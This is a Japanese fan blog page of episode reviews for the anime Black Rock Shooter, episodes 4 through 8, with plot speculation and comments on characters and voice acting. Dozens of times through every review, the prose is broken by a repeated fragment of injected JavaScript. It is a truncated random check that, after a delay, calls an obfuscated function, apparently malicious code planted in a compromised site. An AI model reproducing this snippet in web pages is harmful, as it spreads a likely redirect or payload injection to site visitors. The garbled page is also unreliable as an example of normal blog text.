カレンダー

2018年11月
« 2月  
 123
45678910
11121314151617
18192021222324
252627282930 

【アニメ感想】ブラック★ロックシューター 第8話「世界を超えて」

最新しか配信されていないためリンクはなしにしています。(過去動画は非公開となっているため)

ネタバレ有り

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

相変わらずの薬莢の量。

綺麗な映像でよく動きますよね。

ヨミが復活して、ほかはどうなるんだろうと思っていましたが。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

みんな来たよ~という感じでしたが、まさかこういう登場とはね。

相変わらずの意外な演出というべきなのか。

間でいろいろと話しがありましたが、ようするに

お互い傷つけ合わないと理解し合えないって感じなんだろうか。

まあ、この手の話は要約するものじゃないきもするけど、そういう感じなのかなと

ざっくり思った次第です。

BRSとマトの会話は演じ分けも大変そうね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

こはっち先輩もなにげにいましたよね。その他の人物も実際には右のほうにいましたが。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ストレングスが可愛く見える。

そして、安心のBRSのぺったんこ。

とかいうアニメでもないんだけどね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

しっぽフリフリな感じが可愛いと感じるのは少数派なのだろうか。

しかし、これで最終回だったのかな。

なんだよね。

もにょっとした終わり方だったけど、まあ、それなりに楽しめたのかな。

うーん。

前の話で盛り上がるか!!

と思ったけど、特に盛り上がらずに終ってしまったのが残念かな。

話的にはまとまっていたと思う。(面白いかどうかは別として)

そもそも、面白いと感じるテーマでもないしね。

考えさせられる系なアニメですよね。

昔は、押井守とか、そういった人がこういう感じの脚本をみかけた。

さてさて、終ってしまったのだけれど

次に見えるアニメがあまりない気もする。

今季のように、見てみたら意外と面白い!!

というのが見つかるといいな。

【アニメ感想】ブラック★ロックシューター 第7話「闇を駆ける星に願いを」

最新しか配信されていないためリンクはなしにしています。(過去動画は非公開となっているため)

ネタバレ有り

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ニコニコ動画のコメントだと、前から伏線があったろうというのがありましたが、よくわかりませんでした。

いきなりしゃべり始めた、この子がユウだったのね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そして、こっちがストレングス。

実際にはこっちにいないはずだから、影がないのかな?

それとも、別の理由なのか。入れ替わってるだけなら影があってもいい気がするんだけど、よくわからないです。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

忘れたはずの気持ちに気づくのか、気持ち悪い発言。

あとで救援にいったりするのかな?

OPの5キャラのうちBRSをのぞく4キャラでBRSと戦うとか?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そして、ついに思い出す。

みていて、ついに来たか!!(ガタッ

という感じでしたね。

それにしても、BRSは硬いですね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

前までに殺られたキャラですよね。

崖から投げ捨てるシーンがあったから、ここに集まってるのかな。

ちゃんと、マカロンのやつは、ばらばら・・・

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

静止画だとわからないですが、まぶたがぴくぴくっと動きましたね。

こちらも目を覚まして、次の話で参戦っぽいです。

だいたいの話はわかるようになって来ましたね。

ところで、ユウとストレングスのことはどう決着をさせるのかな。

ユウは何かをきっかけで、納得し、外の世界に戻ってくるのか?

そもそも、BRSとかの世界はどうなるのか。ストレングスたちはそのまま残るのか。

痛みから逃げちゃだめてきな感じでまとめちゃったりするのかな。

この手のお話はどうぶっとんでいくかわからない。

そうそう、BRSは無表情だったのに、やけに表情がつくようになってますね。

【アニメ感想】ブラック★ロックシューター 第6話「あるはずもないあの時の希望」

最新しか配信されていないためリンクはなしにしています。(過去動画は非公開となっているため)

ネタバレあり

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そういえば、OPの5人。

今回の話で正式にわかりましたね。

左から、

カガリ(チャリオット)

ヨミ(デッドマスター)

マト(ブラック★ロックシューター)

ユウ(ストレングス?)

サヤ(ブラック★ゴールドソー)

となりますね。

あっさりデットマスターは殺られてしまってました。

もっと引っ張るかとおもいきや、あっさりでした。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

サヤちゃん先生の昔話。

まさか、サヤがユウを助けようとして、そして、許しをこようとしていたという展開とはね。

どういう展開となるか、先はわかりません。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ざわざわするということがどういう意味を持つのか。

想いはなくなったけど、何かが実は残っている的な展開になるのか。

はたまた、まったく違う話なのか。

展開が斜め上にいくことが多いので、予想がつきません。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

見事にマトのを消しちゃいましたね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

マトとのことも消し去ってこれから明るい子になるのか?

それとも、斜め上な展開が待っているのか。

マトが覚醒したっぽいから、何かはじめるみたいけど、何するか予想つきません。

みんな傷を受けたことを忘れたけど、これをみんなに戻しちゃう的なことをしちゃうのかな。

そうすると、ストレングスが抱えていた痛みは、ユウに戻ることになるから、やばいことになる気もする。

話が少し見えてきて、ようやく物語が動きそう?

【アニメ感想】ブラック★ロックシューター 第5話「ブラック★ロックシューター」

最新しか配信されていないためリンクはなしにしています。(過去動画は非公開となっているため)

ネタバレあり

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

このキャラクターはさやちゃん先生?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ベールみたいなものしてないし、別キャラだよね?

ここで消えていったのは、これで舞台は整ったということだったのかな?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ここは、最初みたときは、ヨミの病んでいる状態ばっかりきになってた。

なにげに、ここは、影にいるから、わからないようにしてあるのね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そして、このシーンでは、影がない。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

さわちゃん先生は、紅茶をだすし、あのマグカップも使用しない。

ブラックのコーヒーが便利ってのは、怪しい薬とかが混ぜやすいとかなのかな?

このあたりはあとで、説明があるのだろうか。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

このシーンで部長が覚えていないのは、伏線だったのね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

このシーンでも影がない。

ここは、影が無いことを演出上、強調してそうな気もする。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ここでブラックロックシューターと読んでいるのは、どういう意味なのか?

誕生したという意味なの

か、もともとブラックロックシューターだったのか?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ここのヨミの声はすさまじい。まさに名演技。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

赤い光を放ち始め

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

元の青と赤が混じり合う

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

赤と青が混じって紫色になったのは、どういう意味があるのか?

さわちゃん先生が伏線っぽいこといっていたけど、どうなることなのか。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

星がわれちゃった。

これが何を意味するのか!?

まさに次話を待てってことですね。

そういえば、こうやって次の話が楽しみになるってのも少ないかもしれない。

これからどんな話になっていくのやら、楽しみです。

【アニメ感想】ブラック★ロックシューター 第4話「いつか夢見た世界が閉じる」

最新しか配信されていないためリンクはなしにしています。(過去動画は非公開となっているため)

ネタバレ注意!!

今回の展開は予想外でした。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

崖から捨てるシーンにどんな意味があるのかなと思っていましたが

これは、それに関する感情?記憶的なものも捨てるという感じかな?

前の話でBRSが倒したやつも、それによってそれに関する感情がなくなったのかもしれないです。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

転校してきたのはいいけど、いきなりの毒舌。

普通はこれでクラスに馴染めなくて的な展開かとおもいきや

ドM集団なクラスメイトなのか。

この展開は予想外で面白かった。お前ら訓練されすぎ。

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

さやちゃん先生のコップ。

小鳥ですね。これは生徒ごとに用意されてるっぽい感じですね。

(あとのレンジとのシーンをみても、そんな感じです)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

変にこじれる展開なのかなと、このあたりは普通にみていました。

ヨミと仲良くしているシーンをみて、ヨミがショックをうけるとかそんな定番な展開を予想をしていた。

そんな定番ひっくり返されたけど。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ヨミを追い込む追撃メール。

これはもう、見ている人はみんな追い打ちになるのわかっていたでしょうね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

仲直りするけど、これでヨミが依存しちゃうのか。

とか、思っていましたよ・・・

このあとの、ヨミの

「えっ・・・」

というところで、マヂカ!!とびっくりしましたよ。

まさかの展開でした。

私も、えっ?とか、いいそうになった。

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

なんか表情が微妙なことが多いなと思っていたら、ヨミが好きだったこと、お世話されていたことがよくわからなくなっているとのこと。

先輩と同じ状態ってことですよね。

付きまとわれて迷惑に感じていたからあの表情だったのだろうか。

なんにせよ、まさかの展開でびっくりでした。

ひさしぶりに典型でびっくりさせされました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

「できた・・・」てなことらしいです。

先生・・・このマグカップが象徴なんですね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

これでダークマター完成でしょうか。

それにしても、声優の沢城さんが配役になっているのに納得してしまうしかない。

本当に今回の話はヨミの心情が痛烈にでていました。

好きな声優さんの迫真の演技。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

安心のぺったん。